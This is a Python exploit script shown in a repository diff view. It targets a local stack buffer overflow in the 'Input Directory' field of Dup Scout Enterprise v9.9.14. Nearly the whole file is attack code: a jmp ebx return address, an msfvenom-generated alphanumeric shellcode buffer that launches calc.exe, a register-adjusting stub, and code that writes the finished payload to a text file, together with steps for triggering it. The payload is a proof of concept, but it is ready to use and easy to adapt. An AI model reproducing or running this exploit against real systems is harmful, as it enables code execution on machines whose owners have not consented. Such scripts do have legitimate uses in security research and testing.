Executable file
|
@ -0,0 +1,87 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
###############################################################################
|
||||
# Exploit Title : Dup Scout Enterprise v9.9.14 - 'Input Directory' Local
|
||||
Buffer Overflow
|
||||
# Date : 04 Sept, 2017
|
||||
# Exploit Author : Touhid M.Shaikh - www.touhidshaikh.com
|
||||
# Contact : https://github.com/touhidshaikh
|
||||
# Vendor Homepage: http://www.dupscout.com/
|
||||
# Version : v9.9.14
|
||||
# Software Link :
|
||||
https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe
|
||||
# Vuln Software : Dup Scout Enterprise v9.9.1 (Evaluation)
|
||||
# Tested On : Window 7 (x86)
|
||||
################################################################################
|
||||
|
||||
|
||||
#========================================================================================================================#
|
||||
# TO Reproduce Attack. |
|
||||
#========================================================================================================================#
|
||||
# To trigger the exploit, click "Search" -> second (+) sign -> "Add Input
|
||||
Directory" and paste the content of Dup_Scout_buffer.txt
|
||||
#
|
||||
# Video PoC : https://www.youtube.com/watch?v=vnA0-HR7PCI
|
||||
##########################################################################################################################
|
||||
|
||||
|
||||
jmpebx = "\x15\x2c\x18\x65"
|
||||
|
||||
#badchars = "\x0a\x0d\x2f"
|
||||
|
||||
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e
|
||||
x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
|
||||
buf = ""
|
||||
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
|
||||
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
|
||||
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
|
||||
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
|
||||
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
|
||||
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
|
||||
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
|
||||
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
|
||||
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
|
||||
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
|
||||
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
|
||||
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
|
||||
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
|
||||
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
|
||||
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
|
||||
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
|
||||
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
|
||||
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
|
||||
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
|
||||
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
|
||||
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
|
||||
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
|
||||
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
|
||||
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
|
||||
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
|
||||
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
|
||||
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
|
||||
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
|
||||
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
|
||||
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
|
||||
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
|
||||
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
|
||||
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
|
||||
|
||||
mixed = (
|
||||
"\x53" # push EBX
|
||||
"\x58" # pop EAX
|
||||
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
|
||||
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
|
||||
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656
|
||||
)
|
||||
|
||||
junk = "\x53\x5b" * 119 + "\x53"
|
||||
|
||||
data = "A"*4096 + jmpebx + "C"*16 + jmpebx + "C"*(5296 - 4096 - 4 - 16 - 4)
|
||||
+ mixed + junk + buf
|
||||
|
||||
a = open("Dup_Scout_buffer.txt", "w")
|
||||
a.write(data)
|
||||
a.close()
|
||||
|
||||
#Greetz : @Pulkit
|
Loading…
Add table
Reference in a new issue